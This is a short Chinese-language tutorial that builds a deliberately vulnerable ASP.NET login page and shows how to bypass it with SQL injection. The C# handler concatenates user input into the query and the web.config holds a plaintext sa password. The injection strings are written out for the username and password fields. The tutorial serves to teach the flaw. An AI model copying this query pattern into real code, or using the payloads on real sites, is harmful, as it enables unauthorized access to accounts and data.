Asp.net SQL注入实例分享



Asp.net SQL注入实例分享

1.web.config里加链接字段：

<configuration>
<connectionStrings >
<add name="myConnectionString"
connectionString="Server=10.231.248.177;Database=testdb;User ID=sa;Password=pa$$word;Trusted_Connection=False;"
providerName="System.Data.SqlClient"/>
</connectionStrings>

2.拖几个控件在form里：

<form id="form1" runat="server">
<asp:Label ID="LU" runat="server" Text="User Name:"></asp:Label>
<asp:TextBox ID="TBU" runat="server"></asp:TextBox>
<br/>
<asp:Label ID="LP" runat="server" Text="Password:"></asp:Label>
<asp:TextBox ID="TBP" runat="server"></asp:TextBox>
<br/>
<asp:Button ID="Login" runat="server" Text="Login" OnClick="Login_Click" />
<div>

3.写登录事件：

protected void Login_Click(object sender, EventArgs e)
{
using(SqlConnection con = new SqlConnection(WebConfigurationManager.ConnectionStrings["myConnectionString"].ConnectionString))
{
con.Open();
SqlCommand cmd = new SqlCommand();
cmd.CommandText = "SELECT Count(1) FROM [User] where UserName='" + TBU.Text.Trim() + "' and Password='" + TBP.Text.Trim() + "'";
cmd.CommandType = CommandType.Text;
cmd.Connection = con;
int count =(int) cmd.ExecuteScalar();
Response.Write(cmd.CommandText);
if (count > 0)
{
Response.Write("<script>alert('Login pass!');</script>");
}
else
{
Response.Write("<script>alert('Login fail!');</script>");
}

}
}

4.构造SQL注入登录：

用户名输入：test' or ''='
密码输入：' or ''='
或者
用户名输入：test
密码输入：' or ''='
如图：





其他ASP.net SQL注入的例子，如果有兴趣可以参考下：
http://www.aspsnippets.com/Articles/SQL-Injection-Attack-its-examples-and-Prevention-mechanisms-and-Techniques-in-ASPNet.aspx
http://www.codeproject.com/Articles/459324/Understading-SQL-Injection-and-Creating-SQL-Inject
http://blogs.iis.net/nazim/sql-injection-demo
其他的SQL注入：http://www.unixwiz.net/techtips/sql-injection.html